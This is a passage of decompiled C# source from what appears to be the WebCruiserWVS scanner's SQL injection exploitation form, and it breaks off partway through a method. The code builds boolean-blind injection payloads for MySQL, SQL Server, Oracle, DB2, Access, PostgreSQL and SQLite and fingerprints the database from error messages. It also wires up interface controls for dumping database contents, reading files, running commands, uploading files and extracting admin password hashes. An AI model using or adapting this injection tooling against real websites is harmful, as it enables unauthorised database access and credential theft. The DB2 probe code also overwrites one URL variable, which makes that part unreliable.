using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Drawing;
using System.Globalization;
using System.IO;
using System.Net;
using System.Resources;
using System.Text;
using System.Text.RegularExpressions;
using System.Threading;
using System.Windows.Forms;
using System.Xml;

namespace WebCruiserWVS
{
	public class FormSQL : Form
	{
		private delegate string ds();

		private delegate void dd(string s);

		private delegate void ClearDD(ListView lv);

		private delegate void RemoveTab(TabPage TabName);

		private delegate void AddTab(TabPage TabName);

		private delegate string DDReadTree(string TreeInfo);

		private delegate int GetTreeCount(string TreeInfo);

		private delegate bool TreeChecked(string TreeInfo);

		private delegate int ddGetListViewCount(ListView lv);

		private delegate bool dd2(int i);

		private delegate string dd3(int i);

		public struct TxtBoxInfo
		{
			public TextBox txtBox;

			public string Text;
		}

		private delegate void ddSetTextBox(TxtBoxInfo txtBoxInfo);

		private FormMain mainfrm;

		private bool GetBlindLocked;

		private string URL = "";

		private string PreFix = "";

		private string PostFix = "";

		private string CommentString = "";

		private int TempTbNum;

		private string WildField = "1";

		private string ExistedTableInAccess = "";

		private string CurrentDBName = "";

		private string Server = "";

		private string LogicOperator = "aNd";

		private VulnSQLInjection vulnSQL;

		private IContainer components;

		private TabControl tabSQLInjection;

		private TabPage tabEnv;

		private TabPage tabDatabase;

		private TabPage tabCMD;

		private TabPage tabFileReader;

		private ToolStrip toolStripSQL;

		private ToolStripLabel toolStripLabel1;

		private ToolStripTextBox txtKeyWord;

		private ToolStripComboBox cmbDBTypeList;

		private ToolStripSeparator toolStripSeparator1;

		private ToolStripLabel toolStripLabel2;

		private ToolStripSeparator toolStripSeparator2;

		private ToolStripLabel toolStripLabel3;

		private ToolStripComboBox cmbParameterType;

		private ToolStripSeparator toolStripSeparator3;

		private SplitContainer splitDB;

		private ToolStrip toolStripDB;

		private ToolStrip toolStripData;

		private ListView listViewData;

		private ToolStripButton btnGetDB;

		private ToolStripSeparator toolStripSeparator4;

		private ToolStripButton btnGetTable;

		private ToolStripSeparator toolStripSeparator5;

		private ToolStripButton btnGetColumn;

		private ToolStripSeparator toolStripSeparator6;

		private ToolStripLabel toolStripLabel4;

		private ToolStripTextBox txtRowsBegin;

		private ToolStripLabel toolStripLabel5;

		private ToolStripTextBox txtRowsEnd;

		private ToolStripButton btnGetData;

		private ToolStripSeparator toolStripSeparator7;

		private ToolStripComboBox cmbChkAllDB;

		private ToolStripSeparator toolStripSeparator8;

		private ToolStrip toolFileReader;

		private ToolStripLabel toolStripLabel6;

		private ToolStripTextBox txtFileName;

		private ToolStripButton btnReadFile;

		private ToolStripSeparator toolStripSeparator10;

		private TextBox txtFileContent;

		private ToolStrip toolStripCommand;

		private ToolStripTextBox txtCMD;

		private ToolStripButton btnCMD;

		private ToolStrip toolStripDBCMD;

		private ToolStripTextBox txtDBCMD;

		private ToolStripButton btnDBCMD;

		private ListBox listBoxCMD;

		private ToolStrip toolStripEnv;

		private ToolStripButton btnGetInfo;

		private ToolStripSeparator toolStripSeparator11;

		private ListView listViewEnv;

		private ColumnHeader columnHeader1;

		private ColumnHeader columnHeader2;

		private ToolStripSeparator toolStripSeparator12;

		private ToolStripSeparator toolStripSeparator15;

		private ToolStripSeparator toolStripSeparator16;

		private ToolStripSeparator toolStripSeparator13;

		private ToolStripSeparator toolStripSeparator14;

		private TabPage tabDebug;

		private GroupBox grpInjectMethod;

		private Label label15;

		private Label label14;

		private Label label13;

		private Label label12;

		private Label label11;

		private Label label10;

		private TextBox txtWildField;

		private Label label9;

		private Button btnSetEnv;

		private Button btnGetEnv;

		private Label label8;

		private TextBox txtInjectField;

		private Label label7;

		private TextBox txtFieldNum;

		private RadioButton radioBlind;

		private RadioButton radioFieldEcho;

		private RadioButton radioPlainText;

		private ImageList WCRImageList;

		private ToolStripSeparator toolStripSeparator9;

		private ToolStripButton btnImpDB;

		private ToolStripSeparator toolStripSeparator17;

		private ToolStripButton btnExpDB;

		private ToolStripButton btnExpData;

		private ToolStripSeparator toolStripSeparator18;

		private ToolStripSeparator toolStripSeparator19;

		private RadioButton radioCrossSite;

		private Label label1;

		private TabPage tabFileUploader;

		private Button btnSelectFile;

		private Button btnFileUpload;

		private TextBox txtUploadFile;

		private Label label2;

		private Label label3;

		private TextBox txtTargetFileName;

		private Label label4;

		private Button btnGetWebRoot;

		private TreeView treeViewDB;

		private TabPage tabEscapeString;

		private TextBox txtSourceString;

		private Label label6;

		private Label label5;

		private Button btnEncode;

		private TextBox txtEscapeString;

		private Label label16;

		private Label label17;

		private Label lblComment;

		private Label label18;

		private TextBox txtComment;

		private Label label19;

		private ComboBox ComboBoxDBEncoding;

		private Label label21;

		private Label label22;

		private ComboBox ComboBoxWebEncoding;

		private Label label20;

		private ToolStripButton ButtonResetSQL;

		private ToolStripSeparator toolStripSeparator20;

		private Button btnDecode;

		private ToolStripButton btnReset;

		private RadioButton radioTime;

		private Label label23;

		public FormSQL(FormMain fm)
			: this()
		{
			InitializeComponent();
			mainfrm = fm;
			cmbDBTypeList.set_SelectedIndex(0);
			cmbParameterType.set_SelectedIndex(0);
			URL = mainfrm.URL;
			cmbChkAllDB.set_SelectedIndex(0);
			((Control)toolStripEnv).set_Visible(true);
			((Control)toolStripDB).set_Visible(true);
			((Control)toolStripData).set_Visible(true);
		}

		private void InitURL()
		{
			if (mainfrm.ReqType == RequestType.GET)
			{
				URL = mainfrm.URL;
			}
			else
			{
				URL = mainfrm.URL + "^" + mainfrm.SubmitData;
			}
		}

		public void InitByVulnSQLInjection(VulnSQLInjection aVulnSQL)
		{
			vulnSQL = aVulnSQL;
			string text = vulnSQL.vulnActionUrl;
			if (text.IndexOf('^') > 0)
			{
				string[] paraNameValue = WebSite.GetParaNameValue(text, '^');
				text = paraNameValue[0];
				mainfrm.UpdateSubmitData(paraNameValue[1]);
				mainfrm.ReqType = vulnSQL.vulnRequestType;
			}
			else
			{
				mainfrm.ReqType = RequestType.GET;
			}
			mainfrm.URL = text;
			mainfrm.InitByRequestType(mainfrm.ReqType);
			mainfrm.UpdateURLText(text);
			mainfrm.CurrentSite.paramType = vulnSQL.vulnParameterType;
			mainfrm.CurrentSite.injectMethod = vulnSQL.vulnInjectMethod;
			if (mainfrm.CurrentSite.injectMethod == InjectMethod.UnionBased)
			{
				mainfrm.CurrentSite.unionFieldsCount = vulnSQL.unionFieldsCount;
				mainfrm.CurrentSite.unionFieldIndex = vulnSQL.unionFieldIndex;
			}
			mainfrm.CurrentSite.CurrentKeyWord = vulnSQL.vulnKeyword;
			UpdateKeyWordText(mainfrm.CurrentSite.CurrentKeyWord);
			LogicOperator = vulnSQL.vulnLogicOperator;
			UpdateComboInjType(vulnSQL.vulnParameterType.ToString());
			PreFix = vulnSQL.vulnPrefix;
			PostFix = vulnSQL.vulnPostfix;
			if (vulnSQL.vulnDatabaseType == DBType.UnKnown)
			{
				if (mainfrm.CurrentSite.DatabaseType != 0)
				{
					vulnSQL.vulnDatabaseType = mainfrm.CurrentSite.DatabaseType;
				}
			}
			else
			{
				mainfrm.CurrentSite.DatabaseType = vulnSQL.vulnDatabaseType;
			}
			InitByDBType(IsLoadFromFile: false);
			UpdateComboDBType(vulnSQL.vulnDatabaseType.ToString());
		}

		private string GetKeyWordText()
		{
			if (!((Control)toolStripSQL).get_InvokeRequired())
			{
				return ((ToolStripItem)txtKeyWord).get_Text().Trim();
			}
			ds ds = GetKeyWordText;
			return (string)((Control)this).Invoke((Delegate)ds, new object[0]);
		}

		private void UpdateComboDBType(string DBString)
		{
			if (!((Control)toolStripSQL).get_InvokeRequired())
			{
				cmbDBTypeList.set_SelectedIndex(cmbDBTypeList.FindString(DBString));
				return;
			}
			dd dd = UpdateComboDBType;
			((Control)this).Invoke((Delegate)dd, new object[1]
			{
				DBString
			});
		}

		private void UpdateComboInjType(string InjString)
		{
			if (!((Control)toolStripSQL).get_InvokeRequired())
			{
				cmbParameterType.set_SelectedIndex(cmbParameterType.FindString(InjString));
				return;
			}
			dd dd = UpdateComboInjType;
			((Control)this).Invoke((Delegate)dd, new object[1]
			{
				InjString
			});
		}

		public void UpdateKeyWordText(string ItemText)
		{
			if (!((Control)toolStripSQL).get_InvokeRequired())
			{
				((ToolStripItem)txtKeyWord).set_Text(ItemText);
				((Control)toolStripSQL).Refresh();
			}
			else
			{
				dd dd = UpdateKeyWordText;
				((Control)this).Invoke((Delegate)dd, new object[1]
				{
					ItemText
				});
			}
		}

		private bool isIncludeCurrentKeyword(string source)
		{
			if (source.IndexOf(mainfrm.CurrentSite.CurrentKeyWord) >= 0)
			{
				return true;
			}
			return false;
		}

		private string GetKeyWord(string sURL, bool skipScanned)
		{
			//IL_0125: Unknown result type (might be due to invalid IL or missing references)
			//IL_016e: Unknown result type (might be due to invalid IL or missing references)
			//IL_02fa: Unknown result type (might be due to invalid IL or missing references)
			//IL_031c: Unknown result type (might be due to invalid IL or missing references)
			string keyWordText = GetKeyWordText();
			if (!string.IsNullOrEmpty(keyWordText))
			{
				return keyWordText;
			}
			mainfrm.DisplayLogList("Getting KeyWord...");
			string uRL = "";
			string uRL2 = "";
			string text = "";
			string text2 = "";
			if (mainfrm.CurrentSite.paramType == ParameterType.UnKnown)
			{
				VulnSQLInjection[] sQLInjectionVulnCollection = mainfrm.CurrentSite.GetSQLInjectionVulnCollection(sURL, mainfrm.ReqType, sURL, skipScanned, testEscapeSpace: false, vulnSQL.vulnPostEncType);
				if (sQLInjectionVulnCollection.Length == 0)
				{
					sQLInjectionVulnCollection = mainfrm.CurrentSite.GetSQLInjectionVulnCollection(sURL, mainfrm.ReqType, sURL, skipScanned, testEscapeSpace: true, vulnSQL.vulnPostEncType);
				}
				VulnSQLInjection[] array = sQLInjectionVulnCollection;
				foreach (VulnSQLInjection vuln in array)
				{
					mainfrm.AddNewVuln(vuln);
				}
				VulnSQLInjection[] array2 = sQLInjectionVulnCollection;
				int num = 0;
				if (num < array2.Length)
				{
					InitByVulnSQLInjection(vulnSQL = array2[num]);
					return mainfrm.CurrentSite.CurrentKeyWord;
				}
				MessageBox.Show("Get KeyWord Failed! Possible Reasons:\r\n\r\n* Current URL is not injectable!\r\n* Make sure [Scan SQL Injection] checked in setting.\r\n* Special characters were filtered.\r\n* Web application firewall or other access control used.\r\n", "Information", (MessageBoxButtons)0, (MessageBoxIcon)16);
				mainfrm.CurrentSite.CurrentKeyWord = "";
				return mainfrm.CurrentSite.CurrentKeyWord;
			}
			if (mainfrm.CurrentSite.paramType == ParameterType.NotInjectable)
			{
				MessageBox.Show("Current URL is not injectable !", "Information");
				mainfrm.CurrentSite.CurrentKeyWord = "";
				return mainfrm.CurrentSite.CurrentKeyWord;
			}
			if (mainfrm.CurrentSite.paramType == ParameterType.Integer)
			{
				uRL = URL + "%20and%207=7";
				uRL2 = URL + "%20and%207=2";
			}
			else if (mainfrm.CurrentSite.paramType == ParameterType.String)
			{
				uRL = URL + PreFix + "%20and%20%277%27=%277";
				uRL2 = URL + PreFix + "%20and%20%277%27=%272";
			}
			else if (mainfrm.CurrentSite.paramType == ParameterType.Search)
			{
				uRL = URL + PreFix + "%20and%201%3D1%20and%20%27%25%27%3D%27";
				uRL2 = URL + PreFix + "%20and%201%3D2%20and%20%27%25%27%3D%27";
			}
			text = mainfrm.CurrentSite.GetSourceCodeWithEscapeSpaceOption(uRL, mainfrm.ReqType, vulnSQL.needEscapeSpace, vulnSQL.vulnPostEncType);
			text2 = mainfrm.CurrentSite.GetSourceCodeWithEscapeSpaceOption(uRL2, mainfrm.ReqType, vulnSQL.needEscapeSpace, vulnSQL.vulnPostEncType);
			mainfrm.CurrentSite.CurrentKeyWord = WebSite.GetKeyWordBySource(text, text2);
			if (string.IsNullOrEmpty(mainfrm.CurrentSite.CurrentKeyWord))
			{
				MessageBox.Show("Get KeyWord Failed! Possible Reasons:\r\n\r\n* Current URL is not injectable!\r\n* Special characters were filtered.\r\n* Web application firewall or other access control used.\r\n", "Information", (MessageBoxButtons)0, (MessageBoxIcon)16);
				if (mainfrm.CurrentSite.paramType == ParameterType.Integer)
				{
					MessageBox.Show("Please select the Injection Type: \"String\", and Retry!", "Information");
				}
			}
			UpdateKeyWordText(mainfrm.CurrentSite.CurrentKeyWord);
			return mainfrm.CurrentSite.CurrentKeyWord;
		}

		private void ClearListView(ListView lv)
		{
			if (!((Control)lv).get_InvokeRequired())
			{
				lv.get_Items().Clear();
				return;
			}
			ClearDD clearDD = ClearListView;
			((Control)this).Invoke((Delegate)clearDD, new object[1]
			{
				lv
			});
		}

		private void RemoveTabPagesByName(TabPage TabName)
		{
			if (!((Control)tabSQLInjection).get_InvokeRequired())
			{
				if (tabSQLInjection.get_TabPages().Contains(TabName))
				{
					tabSQLInjection.get_TabPages().Remove(TabName);
				}
			}
			else
			{
				RemoveTab removeTab = RemoveTabPagesByName;
				((Control)this).Invoke((Delegate)removeTab, new object[1]
				{
					TabName
				});
			}
		}

		private void AddTabPagesByName(TabPage TabName)
		{
			if (!((Control)tabSQLInjection).get_InvokeRequired())
			{
				if (!tabSQLInjection.get_TabPages().Contains(TabName))
				{
					TabPage[] array = (TabPage[])(object)new TabPage[1]
					{
						TabName
					};
					tabSQLInjection.get_TabPages().AddRange(array);
				}
			}
			else
			{
				AddTab addTab = AddTabPagesByName;
				((Control)this).Invoke((Delegate)addTab, new object[1]
				{
					TabName
				});
			}
		}

		private void AddItem2ListViewInfo(string ItemText)
		{
			if (!((Control)listViewEnv).get_InvokeRequired())
			{
				listViewEnv.get_Items().Add(ItemText);
				((Control)listViewEnv).Refresh();
			}
			else
			{
				dd dd = AddItem2ListViewInfo;
				((Control)this).Invoke((Delegate)dd, new object[1]
				{
					ItemText
				});
			}
		}

		private void AddDB2TreeView(string NodeText)
		{
			if (!string.IsNullOrEmpty(NodeText))
			{
				if (!((Control)treeViewDB).get_InvokeRequired())
				{
					TreeNode val = treeViewDB.get_Nodes().Add(NodeText);
					val.set_ImageKey("db.png");
					treeViewDB.ExpandAll();
					((Control)treeViewDB).Refresh();
				}
				else
				{
					dd dd = AddDB2TreeView;
					((Control)this).Invoke((Delegate)dd, new object[1]
					{
						NodeText
					});
				}
			}
		}

		private void InitByDBType(bool IsLoadFromFile)
		{
			ClearListView(listViewEnv);
			if (mainfrm.CurrentSite.DatabaseType == DBType.SQLServer)
			{
				AddTabPagesByName(tabCMD);
				AddTabPagesByName(tabFileUploader);
				RemoveTabPagesByName(tabFileReader);
				if (!IsLoadFromFile)
				{
					AddItem2ListViewInfo("Version");
					AddItem2ListViewInfo("Server");
					AddItem2ListViewInfo("WWWRoot");
					AddItem2ListViewInfo("user");
					AddItem2ListViewInfo("IsAdmin");
					AddItem2ListViewInfo("Database");
					AddItem2ListViewInfo("Sa_PasswordHash");
				}
				CommentString = "%2D%2D";
				WildField = "1";
			}
			else if (mainfrm.CurrentSite.DatabaseType == DBType.MySQL)
			{
				RemoveTabPagesByName(tabCMD);
				RemoveTabPagesByName(tabFileUploader);
				AddTabPagesByName(tabFileReader);
				if (!IsLoadFromFile)
				{
					AddItem2ListViewInfo("Version");
					AddItem2ListViewInfo("Server");
					AddItem2ListViewInfo("OS");
					AddItem2ListViewInfo("user");
					AddItem2ListViewInfo("Database");
					AddItem2ListViewInfo("root_PasswordHash");
				}
				CommentString = "%23";
				WildField = "1";
			}
			else if (mainfrm.CurrentSite.DatabaseType == DBType.Oracle)
			{
				RemoveTabPagesByName(tabCMD);
				RemoveTabPagesByName(tabFileUploader);
				RemoveTabPagesByName(tabFileReader);
				if (!IsLoadFromFile)
				{
					AddItem2ListViewInfo("user");
					AddItem2ListViewInfo("Server");
					AddItem2ListViewInfo("Version");
					AddItem2ListViewInfo("instance_name");
					AddItem2ListViewInfo("SYS_PasswordHash");
					AddItem2ListViewInfo("user_PasswordHash");
				}
				CommentString = "%2D%2D";
				WildField = "1";
			}
			else if (mainfrm.CurrentSite.DatabaseType == DBType.Access)
			{
				RemoveTabPagesByName(tabCMD);
				RemoveTabPagesByName(tabFileUploader);
				RemoveTabPagesByName(tabFileReader);
				if (!IsLoadFromFile)
				{
					AddItem2ListViewInfo("Server");
					treeViewDB.get_Nodes().Clear();
					AddDB2TreeView("Access");
				}
				CommentString = "%00";
				WildField = "1";
			}
			else if (mainfrm.CurrentSite.DatabaseType == DBType.DB2)
			{
				RemoveTabPagesByName(tabCMD);
				RemoveTabPagesByName(tabFileUploader);
				RemoveTabPagesByName(tabFileReader);
				AddItem2ListViewInfo("Version");
				AddItem2ListViewInfo("Server");
				AddItem2ListViewInfo("user");
				AddItem2ListViewInfo("Database");
				CommentString = "%2D%2D";
				WildField = "chr(97)";
			}
			else if (mainfrm.CurrentSite.DatabaseType == DBType.PostgreSQL)
			{
				RemoveTabPagesByName(tabCMD);
				RemoveTabPagesByName(tabFileUploader);
				RemoveTabPagesByName(tabFileReader);
				AddItem2ListViewInfo("Version");
				AddItem2ListViewInfo("Server");
				AddItem2ListViewInfo("Database");
				AddItem2ListViewInfo("user");
				AddItem2ListViewInfo("user_PasswordHash");
				CommentString = "%2D%2D";
				WildField = "NULL";
			}
			else if (mainfrm.CurrentSite.DatabaseType == DBType.SQLite)
			{
				RemoveTabPagesByName(tabCMD);
				RemoveTabPagesByName(tabFileUploader);
				RemoveTabPagesByName(tabFileReader);
				if (!IsLoadFromFile)
				{
					AddItem2ListViewInfo("Version");
					AddItem2ListViewInfo("Server");
					treeViewDB.get_Nodes().Clear();
					AddDB2TreeView("SQLite");
				}
				CommentString = "%2D%2D";
				WildField = "1";
			}
			else
			{
				RemoveTabPagesByName(tabCMD);
				RemoveTabPagesByName(tabFileUploader);
				RemoveTabPagesByName(tabFileReader);
				CommentString = "%2D%2D";
			}
		}

		private DBType GetDBType(string URL)
		{
			//IL_00c6: Unknown result type (might be due to invalid IL or missing references)
			//IL_00d0: Invalid comparison between Unknown and I4
			//IL_0257: Unknown result type (might be due to invalid IL or missing references)
			//IL_0261: Invalid comparison between Unknown and I4
			//IL_0ccb: Unknown result type (might be due to invalid IL or missing references)
			try
			{
				mainfrm.DisplayLogList("Getting DataBase Type...");
				string text = URL + "%27";
				string urlencodedPostData = "";
				string customCookie = "";
				if (mainfrm.ReqType != 0)
				{
					int num = text.IndexOf('^');
					string text2 = text.Substring(num + 1);
					if (mainfrm.ReqType == RequestType.POST)
					{
						urlencodedPostData = text2;
					}
					else if (mainfrm.ReqType == RequestType.COOKIE)
					{
						customCookie = text2;
					}
					text = text.Substring(0, num);
				}
				HttpWebResponse httpWebResponse = mainfrm.CurrentSite.GetHttpWebResponse(text, mainfrm.ReqType, urlencodedPostData, vulnSQL.vulnPostEncType, customCookie, WebSite.EscapeCookie, "", "");
				try
				{
					string sourceCodeFromHttpWebResponse = mainfrm.CurrentSite.GetSourceCodeFromHttpWebResponse(httpWebResponse);
					if ((int)httpWebResponse.get_StatusCode() == 500)
					{
						if (sourceCodeFromHttpWebResponse.IndexOf("SQL Server") >= 0)
						{
							mainfrm.CurrentSite.DatabaseType = DBType.SQLServer;
							UpdateComboDBType("SQLserver");
							InitByDBType(IsLoadFromFile: false);
							mainfrm.CurrentSite.injectMethod = InjectMethod.ErrorBased;
							return DBType.SQLServer;
						}
						if (sourceCodeFromHttpWebResponse.IndexOf("JET Database") >= 0 || sourceCodeFromHttpWebResponse.IndexOf("Access Driver") >= 0)
						{
							mainfrm.CurrentSite.DatabaseType = DBType.Access;
							UpdateComboDBType("Access");
							InitByDBType(IsLoadFromFile: false);
							return DBType.Access;
						}
						if (sourceCodeFromHttpWebResponse.IndexOf("MySQL", StringComparison.OrdinalIgnoreCase) >= 0)
						{
							mainfrm.CurrentSite.DatabaseType = DBType.MySQL;
							UpdateComboDBType("MySQL");
							InitByDBType(IsLoadFromFile: false);
							return DBType.MySQL;
						}
						if (sourceCodeFromHttpWebResponse.IndexOf("Ora") >= 0)
						{
							mainfrm.CurrentSite.DatabaseType = DBType.Oracle;
							UpdateComboDBType("Oracle");
							InitByDBType(IsLoadFromFile: false);
							return DBType.Oracle;
						}
						if (sourceCodeFromHttpWebResponse.IndexOf("db2") >= 0)
						{
							mainfrm.CurrentSite.DatabaseType = DBType.DB2;
							UpdateComboDBType("DB2");
							InitByDBType(IsLoadFromFile: false);
							return DBType.DB2;
						}
						if (sourceCodeFromHttpWebResponse.IndexOf("pg_query(): Query failed") >= 0)
						{
							mainfrm.CurrentSite.DatabaseType = DBType.PostgreSQL;
							UpdateComboDBType("PostgreSQL");
							InitByDBType(IsLoadFromFile: false);
							return DBType.PostgreSQL;
						}
					}
					else if ((int)httpWebResponse.get_StatusCode() == 200)
					{
						if (sourceCodeFromHttpWebResponse.IndexOf("com.mysql.jdbc.exceptions") >= 0 || sourceCodeFromHttpWebResponse.IndexOf("MySQL server version") >= 0)
						{
							mainfrm.CurrentSite.DatabaseType = DBType.MySQL;
							UpdateComboDBType("MySQL");
							InitByDBType(IsLoadFromFile: false);
							return DBType.MySQL;
						}
						if (sourceCodeFromHttpWebResponse.IndexOf("java.sql.SQLException: ORA-") >= 0)
						{
							mainfrm.CurrentSite.DatabaseType = DBType.Oracle;
							UpdateComboDBType("Oracle");
							InitByDBType(IsLoadFromFile: false);
							return DBType.Oracle;
						}
					}
				}
				finally
				{
					((IDisposable)httpWebResponse)?.Dispose();
				}
				mainfrm.CurrentSite.CurrentKeyWord = GetKeyWord(URL, skipScanned: false);
				if (string.IsNullOrEmpty(mainfrm.CurrentSite.CurrentKeyWord))
				{
					return DBType.UnKnown;
				}
				string sourceCodeWithEscapeSpaceOption = mainfrm.CurrentSite.GetSourceCodeWithEscapeSpaceOption(URL, mainfrm.ReqType, vulnSQL.needEscapeSpace, vulnSQL.vulnPostEncType);
				string uRL = URL + PreFix + "%20" + LogicOperator + "%20(select%20length(user()))>0" + PostFix;
				string uRL2 = URL + PreFix + "%20" + LogicOperator + "%20(select%20length(user()))<0" + PostFix;
				string sourceCodeWithEscapeSpaceOption2 = mainfrm.CurrentSite.GetSourceCodeWithEscapeSpaceOption(uRL, mainfrm.ReqType, vulnSQL.needEscapeSpace, vulnSQL.vulnPostEncType);
				string keyWordBySource = WebSite.GetKeyWordBySource(sourceCodeWithEscapeSpaceOption, sourceCodeWithEscapeSpaceOption2);
				if (isIncludeCurrentKeyword(sourceCodeWithEscapeSpaceOption2) && ((vulnSQL.shouldSource1EqualsSource0 && string.IsNullOrEmpty(keyWordBySource)) || !vulnSQL.shouldSource1EqualsSource0))
				{
					string sourceCodeWithEscapeSpaceOption3 = mainfrm.CurrentSite.GetSourceCodeWithEscapeSpaceOption(uRL2, mainfrm.ReqType, vulnSQL.needEscapeSpace, vulnSQL.vulnPostEncType);
					string keyWordBySource2 = WebSite.GetKeyWordBySource(sourceCodeWithEscapeSpaceOption2, sourceCodeWithEscapeSpaceOption3);
					if (!string.IsNullOrEmpty(keyWordBySource2))
					{
						mainfrm.CurrentSite.DatabaseType = DBType.MySQL;
						UpdateComboDBType("MySQL");
						InitByDBType(IsLoadFromFile: false);
						return DBType.MySQL;
					}
				}
				uRL = URL + PreFix + "%20" + LogicOperator + "%20(select%20len(user))>0" + PostFix;
				uRL2 = URL + PreFix + "%20" + LogicOperator + "%20(select%20len(user))<0" + PostFix;
				sourceCodeWithEscapeSpaceOption2 = mainfrm.CurrentSite.GetSourceCodeWithEscapeSpaceOption(uRL, mainfrm.ReqType, vulnSQL.needEscapeSpace, vulnSQL.vulnPostEncType);
				keyWordBySource = WebSite.GetKeyWordBySource(sourceCodeWithEscapeSpaceOption, sourceCodeWithEscapeSpaceOption2);
				if (string.IsNullOrEmpty(keyWordBySource) && isIncludeCurrentKeyword(sourceCodeWithEscapeSpaceOption2))
				{
					string sourceCodeWithEscapeSpaceOption3 = mainfrm.CurrentSite.GetSourceCodeWithEscapeSpaceOption(uRL2, mainfrm.ReqType, vulnSQL.needEscapeSpace, vulnSQL.vulnPostEncType);
					string keyWordBySource2 = WebSite.GetKeyWordBySource(sourceCodeWithEscapeSpaceOption2, sourceCodeWithEscapeSpaceOption3);
					if (!string.IsNullOrEmpty(keyWordBySource2))
					{
						mainfrm.CurrentSite.DatabaseType = DBType.SQLServer;
						UpdateComboDBType("SQLserver");
						InitByDBType(IsLoadFromFile: false);
						return DBType.SQLServer;
					}
				}
				uRL = URL + PreFix + "%20" + LogicOperator + "%20(select%20length(user)%20from%20dual)>0" + PostFix;
				uRL2 = URL + PreFix + "%20" + LogicOperator + "%20(select%20length(user)%20from%20dual)<0" + PostFix;
				sourceCodeWithEscapeSpaceOption2 = mainfrm.CurrentSite.GetSourceCodeWithEscapeSpaceOption(uRL, mainfrm.ReqType, vulnSQL.needEscapeSpace, vulnSQL.vulnPostEncType);
				keyWordBySource = WebSite.GetKeyWordBySource(sourceCodeWithEscapeSpaceOption, sourceCodeWithEscapeSpaceOption2);
				if (string.IsNullOrEmpty(keyWordBySource) && isIncludeCurrentKeyword(sourceCodeWithEscapeSpaceOption2))
				{
					string sourceCodeWithEscapeSpaceOption3 = mainfrm.CurrentSite.GetSourceCodeWithEscapeSpaceOption(uRL2, mainfrm.ReqType, vulnSQL.needEscapeSpace, vulnSQL.vulnPostEncType);
					string keyWordBySource2 = WebSite.GetKeyWordBySource(sourceCodeWithEscapeSpaceOption2, sourceCodeWithEscapeSpaceOption3);
					if (!string.IsNullOrEmpty(keyWordBySource2))
					{
						mainfrm.CurrentSite.DatabaseType = DBType.Oracle;
						UpdateComboDBType("Oracle");
						InitByDBType(IsLoadFromFile: false);
						return DBType.Oracle;
					}
				}
				uRL = URL + PreFix + "%20" + LogicOperator + "%20(select%20length(user)%20from%20sysibm.sysdummy1)>0" + PostFix;
				uRL = URL + PreFix + "%20" + LogicOperator + "%20(select%20length(user)%20from%20sysibm.sysdummy1)<0" + PostFix;
				sourceCodeWithEscapeSpaceOption2 = mainfrm.CurrentSite.GetSourceCodeWithEscapeSpaceOption(uRL, mainfrm.ReqType, vulnSQL.needEscapeSpace, vulnSQL.vulnPostEncType);
				keyWordBySource = WebSite.GetKeyWordBySource(sourceCodeWithEscapeSpaceOption, sourceCodeWithEscapeSpaceOption2);
				if (string.IsNullOrEmpty(keyWordBySource) && isIncludeCurrentKeyword(sourceCodeWithEscapeSpaceOption2))
				{
					string sourceCodeWithEscapeSpaceOption3 = mainfrm.CurrentSite.GetSourceCodeWithEscapeSpaceOption(uRL2, mainfrm.ReqType, vulnSQL.needEscapeSpace, vulnSQL.vulnPostEncType);
					string keyWordBySource2 = WebSite.GetKeyWordBySource(sourceCodeWithEscapeSpaceOption2, sourceCodeWithEscapeSpaceOption3);
					if (!string.IsNullOrEmpty(keyWordBySource2))
					{
						mainfrm.CurrentSite.DatabaseType = DBType.DB2;
						UpdateComboDBType("DB2");
						InitByDBType(IsLoadFromFile: false);
						return DBType.DB2;
					}
				}
				uRL = URL + PreFix + "%20" + LogicOperator + "%20asc(chr(97))=97" + PostFix;
				uRL2 = URL + PreFix + "%20" + LogicOperator + "%20asc(chr(97))=96" + PostFix;
				sourceCodeWithEscapeSpaceOption2 = mainfrm.CurrentSite.GetSourceCodeWithEscapeSpaceOption(uRL, mainfrm.ReqType, vulnSQL.needEscapeSpace, vulnSQL.vulnPostEncType);
				keyWordBySource = WebSite.GetKeyWordBySource(sourceCodeWithEscapeSpaceOption, sourceCodeWithEscapeSpaceOption2);
				if (string.IsNullOrEmpty(keyWordBySource) && isIncludeCurrentKeyword(sourceCodeWithEscapeSpaceOption2))
				{
					string sourceCodeWithEscapeSpaceOption3 = mainfrm.CurrentSite.GetSourceCodeWithEscapeSpaceOption(uRL2, mainfrm.ReqType, vulnSQL.needEscapeSpace, vulnSQL.vulnPostEncType);
					string keyWordBySource2 = WebSite.GetKeyWordBySource(sourceCodeWithEscapeSpaceOption2, sourceCodeWithEscapeSpaceOption3);
					if (!string.IsNullOrEmpty(keyWordBySource2))
					{
						mainfrm.CurrentSite.DatabaseType = DBType.Access;
						UpdateComboDBType("Access");
						InitByDBType(IsLoadFromFile: false);
						return DBType.Access;
					}
				}
				uRL = URL + PreFix + "%20" + LogicOperator + "%20length(current_database())>0" + PostFix;
				uRL2 = URL + PreFix + "%20" + LogicOperator + "%20length(current_database())<0" + PostFix;
				sourceCodeWithEscapeSpaceOption2 = mainfrm.CurrentSite.GetSourceCodeWithEscapeSpaceOption(uRL, mainfrm.ReqType, vulnSQL.needEscapeSpace, vulnSQL.vulnPostEncType);
				keyWordBySource = WebSite.GetKeyWordBySource(sourceCodeWithEscapeSpaceOption, sourceCodeWithEscapeSpaceOption2);
				if (string.IsNullOrEmpty(keyWordBySource) && isIncludeCurrentKeyword(sourceCodeWithEscapeSpaceOption2))
				{
					string sourceCodeWithEscapeSpaceOption3 = mainfrm.CurrentSite.GetSourceCodeWithEscapeSpaceOption(uRL2, mainfrm.ReqType, vulnSQL.needEscapeSpace, vulnSQL.vulnPostEncType);
					string keyWordBySource2 = WebSite.GetKeyWordBySource(sourceCodeWithEscapeSpaceOption2, sourceCodeWithEscapeSpaceOption3);
					if (!string.IsNullOrEmpty(keyWordBySource2))
					{
						mainfrm.CurrentSite.DatabaseType = DBType.PostgreSQL;
						UpdateComboDBType("PostgreSQL");
						InitByDBType(IsLoadFromFile: false);
						return DBType.PostgreSQL;
					}
				}
				uRL = URL + PreFix + "%20" + LogicOperator + "%20length(sqlite_version())>0" + PostFix;
				uRL2 = URL + PreFix + "%20" + LogicOperator + "%20length(sqlite_version())<0" + PostFix;
				sourceCodeWithEscapeSpaceOption2 = mainfrm.CurrentSite.GetSourceCodeWithEscapeSpaceOption(uRL, mainfrm.ReqType, vulnSQL.needEscapeSpace, vulnSQL.vulnPostEncType);
				keyWordBySource = WebSite.GetKeyWordBySource(sourceCodeWithEscapeSpaceOption, sourceCodeWithEscapeSpaceOption2);
